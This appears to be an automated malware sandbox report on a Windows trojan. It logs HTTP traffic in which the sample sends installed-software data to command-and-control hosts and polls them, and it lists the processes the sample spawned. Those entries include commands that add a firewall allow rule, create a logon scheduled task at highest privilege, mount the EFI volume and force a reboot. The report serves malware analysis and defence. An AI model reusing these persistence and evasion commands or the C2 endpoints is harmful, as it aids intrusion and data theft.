                                                            2021-10-20 10:38:52 UTC  4  OUT  Data Ascii: "install_date":""},{"display_name":"SchedulingAgent","display_version":"","install_date":""},{"display_name":"Security Update for Microsoft Access 2016 (KB4484167) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Update for Microso
                                                            2021-10-20 10:38:52 UTC  5  OUT  Data Ascii: display_name":"Security Update for Microsoft Word 2016 (KB4484300) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Update for Microsoft Office 2016 (KB4011634) 32-Bit Edition","display_version":"","install_date":""},{"display_name
                                                            2021-10-20 10:38:52 UTC  9  OUT  Data Ascii: stall_date":"20190627"},{"display_name":"Update for Microsoft OneDrive for Business (KB4022219) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Security Update for Microsoft Outlook 2016 (KB4484274) 32-Bit Edition","display_versio
                                                            2021-10-20 10:38:52 UTC  13  OUT  Data Ascii: 2016","display_version":"16.0.4266.1001","install_date":"20200723"},{"display_name":"Microsoft Office Shared MUI (English) 2016","display_version":"16.0.4266.1001","install_date":"20200723"},{"display_name":"Update for Microsoft Office 2016 (KB4464538) 32
                                                            2021-10-20 10:38:52 UTC  17  OUT  Data Ascii: 11259) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Security Update for Microsoft Office 2016 (KB4011574) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Microsoft Skype for Business MUI (English) 2016"
                                                            2021-10-20 10:38:52 UTC  19  IN  HTTP/1.1 404 Not Found
                                                            Date: Wed, 20 Oct 2021 10:38:52 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-powered-by: PHP/8.0.11
                                                            CF-Cache-Status: DYNAMIC
                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bgH1j2HJCY1PRrFLZl7AB6WEYhGar0eyGh1Olq8Yrqc4KyXlqKkIUG1R2oMtRRN4E%2B5caViwgYNDD%2BHbwz0YxpqhoClLcU1HQOg3gjevpe9gtDOl1RdkeurtWdZscezbsM8CVdgC9Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 6a119e7accff4a85-FRA
                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            2021-10-20 10:38:52 UTC  20  IN  Data Ascii: 4a8<!DOCTYPE html><html><head> <meta charset="utf-8" /> <title>Not Found (#404)</title> <style> body { font: normal 9pt "Verdana"; color: #000; background: #fff; } h1 {
                                                            2021-10-20 10:38:52 UTC  21  IN  Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                            2           192.168.2.6  49756        104.21.34.203   443               C:\Windows\rss\csrss.exe
                                                            Timestamp  kBytes transferred  Direction  Data
                                                            2021-10-20 10:38:56 UTC  21  OUT  POST /api/log HTTP/1.1
                                                            Host: runmodes.com
                                                            User-Agent: Go-http-client/1.1
                                                            Content-Length: 132
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept-Encoding: gzip
                                                            2021-10-20 10:38:56 UTC  22  IN  HTTP/1.1 200 OK
                                                            Date: Wed, 20 Oct 2021 10:38:56 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-powered-by: PHP/8.0.11
                                                            CF-Cache-Status: DYNAMIC
                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WAG1C17CY4fCRL2LJN8e3aq%2B7HlcLFCGPD8XnoUjXX2k9n9%2Fnm4Q7C6j7xR32dkjKcSijYOyc%2FXTdhTFMOGvjP1xoSHLb60d0D4rtoXfM%2F8vIhSFU6Qsn4D4xZiGi5w%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 6a119e9479b96946-FRA
                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            2021-10-20 10:38:56 UTC | 22 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            3 | 192.168.2.6 | 49757 | 172.67.139.144 | 443 | C:\Windows\rss\csrss.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            2021-10-20 10:38:57 UTC | 22 | OUT | POST /api/poll HTTP/1.1
                                                            Host: server12.trumops.com
                                                            User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0
                                                            Content-Length: 644
                                                            Accept-Encoding: gzip
                                                            2021-10-20 10:38:57 UTC | 23 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 20 Oct 2021 10:38:57 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-powered-by: PHP/8.0.11
                                                            set-cookie: PHPSESSID=er4u6n5slre08iuqa9ddhgfmgo; path=/; HttpOnly
                                                            expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            cache-control: no-store, no-cache, must-revalidate
                                                            pragma: no-cache
                                                            access-control-allow-credentials: false
                                                            CF-Cache-Status: DYNAMIC
                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Rgb7JlualPWZhQeqXYWeh98Yrz9b8%2BunEhKY0AvJLX2REx0Xd8N8HyfLKgF2ERcI3yi3xhLeBgnu5NHC6J9E5ruHDbsbBALuGedShIpMoxThl84EGih4rVj%2FVnDNpL%2BZGrUMIAbITQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 6a119e9beb7542db-FRA
                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            2021-10-20 10:38:57 UTC | 24 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            4 | 192.168.2.6 | 49764 | 172.67.139.144 | 443 | C:\Windows\rss\csrss.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            2021-10-20 10:39:11 UTC | 24 | OUT | GET /api/cdn?c=177c2a906396ff21&uuid=8cf49c60-c834-48e4-bacd-9cc30e6a4460 HTTP/1.1
                                                            Host: server12.trumops.com
                                                            User-Agent: Go-http-client/1.1
                                                            Accept-Encoding: gzip
                                                            2021-10-20 10:39:11 UTC | 24 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 20 Oct 2021 10:39:11 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-powered-by: PHP/8.0.11
                                                            access-control-allow-credentials: false
                                                            CF-Cache-Status: DYNAMIC
                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OU3TKovUnyVfa5aW6T50VtWrFT3%2BH1sRnfcVAqrxJ%2BPPZMG0NSBVGgwF0ofgapIo5pdxOmXkljw3ehz%2BtQj1ZwAzmI1B%2Fz9dESPct7o5VpfyIxFpaRGOeCzFcArWbas2HxeaR93nwQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 6a119ef1ddf7696f-FRA
                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            2021-10-20 10:39:11 UTC | 26 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            5 | 192.168.2.6 | 49768 | 104.21.34.203 | 443 | C:\Windows\rss\csrss.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            2021-10-20 10:39:19 UTC | 26 | OUT | POST /api/log HTTP/1.1
                                                            Host: runmodes.com
                                                            User-Agent: Go-http-client/1.1
                                                            Content-Length: 160
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept-Encoding: gzip
                                                            2021-10-20 10:39:19 UTC | 26 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 20 Oct 2021 10:39:19 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-powered-by: PHP/8.0.11
                                                            CF-Cache-Status: DYNAMIC
                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=G44PUacMAxNS3Dq3Hk81qdl9psprUpXBwU23ptXbEaEkrCGL%2B1UoonL513RscNDGZFQfAO0dQlt6BuUQmlOqgkPnhEo6anACNiZOT35%2BHXJ0uOPTI%2Bb%2B5xDf%2FuwLDG8%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 6a119f2008d7432d-FRA
                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            2021-10-20 10:39:19 UTC | 27 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            6 | 192.168.2.6 | 49771 | 172.67.139.144 | 443 | C:\Windows\rss\csrss.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            2021-10-20 10:39:42 UTC | 27 | OUT | POST /api/poll HTTP/1.1
                                                            Host: server12.trumops.com
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 YaBrowser/20.2.4.143 Yowser/2.5 Safari/537.36
                                                            Content-Length: 664
                                                            Accept-Encoding: gzip
                                                            2021-10-20 10:39:42 UTC | 28 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 20 Oct 2021 10:39:42 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-powered-by: PHP/8.0.11
                                                            set-cookie: PHPSESSID=ihictia5gvlqkfgn9rmhuf8pgc; path=/; HttpOnly
                                                            expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            cache-control: no-store, no-cache, must-revalidate
                                                            pragma: no-cache
                                                            access-control-allow-credentials: false
                                                            CF-Cache-Status: DYNAMIC
                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VuZcu8Rp0SwcfAOzPsHBuPj8LCUZ6Ql2CEt1HD5sqBnqtU7hoJEDNbHv2yW9Dp%2FVUrCT%2FMt5dFBhjq16uaYLIFwI0FrCkFe%2BuY0VdV4IHuLCKxmh8AywoOMlraByjzwDwLVsZ8YsgQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 6a119fb55fa42488-FRA
                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            2021-10-20 10:39:42 UTC | 29 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            7 | 192.168.2.6 | 49855 | 172.67.139.144 | 443 | C:\Windows\rss\csrss.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            2021-10-20 10:41:01 UTC | 29 | OUT | POST /api/poll HTTP/1.1
                                                            Host: server12.trumops.com
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
                                                            Content-Length: 664
                                                            Accept-Encoding: gzip
                                                            2021-10-20 10:41:01 UTC | 30 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 20 Oct 2021 10:41:01 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-powered-by: PHP/8.0.11
                                                            set-cookie: PHPSESSID=r0bvjm1tq2m76j34nbfn7o10n5; path=/; HttpOnly
                                                            expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            cache-control: no-store, no-cache, must-revalidate
                                                            pragma: no-cache
                                                            access-control-allow-credentials: false
                                                            CF-Cache-Status: DYNAMIC
                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4VproYKIjqRa5RSHQqMpqU3WrJiRn2KWRmnj96dUzXH3TZePk9Kqh%2F4AwUlTri5%2FQ9kQkVvBt%2B3ca7g1AsCTMQt5dvyz91Q3y2ZTNtGrdiVJaPbYOuTh0im3PuIagx%2BOd7HgGnw%2FQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 6a11a19e1ed14de2-FRA
                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            2021-10-20 10:41:01 UTC | 31 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            System Behavior

                                                            General

                                                            Start time:12:38:43
                                                            Start date:20/10/2021
                                                            Path:C:\Users\user\Desktop\f6oNLRKHUy.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:'C:\Users\user\Desktop\f6oNLRKHUy.exe'
                                                            Imagebase:0x400000
                                                            File size:3788288 bytes
                                                            MD5 hash:3C3046F640F7825C720849AAA809C963
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, Author: Joe Security
                                                            Reputation:low

                                                            General

                                                            Start time:12:38:46
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\servicing\TrustedInstaller.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\servicing\TrustedInstaller.exe
                                                            Imagebase:0x7ff764c00000
                                                            File size:131584 bytes
                                                            MD5 hash:4578046C54A954C917BB393B70BA0AEB
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            General

                                                            Start time:12:38:46
                                                            Start date:20/10/2021
                                                            Path:C:\Users\user\Desktop\f6oNLRKHUy.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\f6oNLRKHUy.exe
                                                            Imagebase:0x400000
                                                            File size:3788288 bytes
                                                            MD5 hash:3C3046F640F7825C720849AAA809C963
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, Author: Joe Security
                                                            Reputation:low

                                                            General

                                                            Start time:12:38:48
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                            Imagebase:0x7ff6b7590000
                                                            File size:51288 bytes
                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:12:38:48
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes'
                                                            Imagebase:0x7ff7180e0000
                                                            File size:273920 bytes
                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:12:38:48
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff61de10000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:12:38:49
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\netsh.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes
                                                            Imagebase:0x7ff75b430000
                                                            File size:92672 bytes
                                                            MD5 hash:98CC37BBF363A38834253E22C80A8F32
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            General

                                                            Start time:12:38:50
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\rss\csrss.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\rss\csrss.exe ''
                                                            Imagebase:0x400000
                                                            File size:3788288 bytes
                                                            MD5 hash:3C3046F640F7825C720849AAA809C963
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 31%, Metadefender, Browse
                                                            • Detection: 52%, ReversingLabs
                                                            Reputation:low

                                                            General

                                                            Start time:12:38:52
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F
                                                            Imagebase:0x7ff787550000
                                                            File size:226816 bytes
                                                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:12:38:53
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff61de10000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:12:38:53
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks /delete /tn ScheduledUpdate /f
                                                            Imagebase:0x7ff787550000
                                                            File size:226816 bytes
                                                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:38:53
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff61de10000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:38:53
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\SysWOW64\mountvol.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:mountvol B: /s
                                                            Imagebase:0x30000
                                                            File size:15360 bytes
                                                            MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:38:54
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff61de10000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:38:55
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\rss\csrss.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\rss\csrss.exe
                                                            Imagebase:0x400000
                                                            File size:3788288 bytes
                                                            MD5 hash:3C3046F640F7825C720849AAA809C963
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, Author: Joe Security

                                                            General

                                                            Start time:12:38:55
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\SysWOW64\mountvol.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:mountvol B: /d
                                                            Imagebase:0x30000
                                                            File size:15360 bytes
                                                            MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:38:55
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff61de10000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:38:56
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\SysWOW64\mountvol.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:mountvol B: /s
                                                            Imagebase:0x7ff6b7590000
                                                            File size:15360 bytes
                                                            MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:38:56
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\rss\csrss.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\rss\csrss.exe
                                                            Imagebase:0x400000
                                                            File size:3788288 bytes
                                                            MD5 hash:3C3046F640F7825C720849AAA809C963
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, Author: Joe Security

                                                            General

                                                            Start time:12:38:57
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff61de10000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:39:00
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\SysWOW64\mountvol.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:mountvol B: /d
                                                            Imagebase:0x30000
                                                            File size:15360 bytes
                                                            MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:39:01
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff61de10000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:39:03
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\rss\csrss.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:'C:\Windows\rss\csrss.exe'
                                                            Imagebase:0x400000
                                                            File size:3788288 bytes
                                                            MD5 hash:3C3046F640F7825C720849AAA809C963
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, Author: Joe Security

                                                            General

                                                            Start time:12:39:04
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\SysWOW64\shutdown.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:shutdown -r -t 5
                                                            Imagebase:0xdf0000
                                                            File size:23552 bytes
                                                            MD5 hash:E2EB9CC0FE26E28406FB6F82F8E81B26
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:39:04
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff61de10000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:39:05
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\rss\csrss.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\rss\csrss.exe
                                                            Imagebase:0x400000
                                                            File size:3788288 bytes
                                                            MD5 hash:3C3046F640F7825C720849AAA809C963
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, Author: Joe Security

                                                            General

                                                            Start time:12:39:08
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                            Imagebase:0x7ff6b7590000
                                                            File size:51288 bytes
                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:39:11
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                            Imagebase:0x7ff6b7590000
                                                            File size:51288 bytes
                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:39:12
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\rss\csrss.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:'C:\Windows\rss\csrss.exe'
                                                            Imagebase:0x400000
                                                            File size:3788288 bytes
                                                            MD5 hash:3C3046F640F7825C720849AAA809C963
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
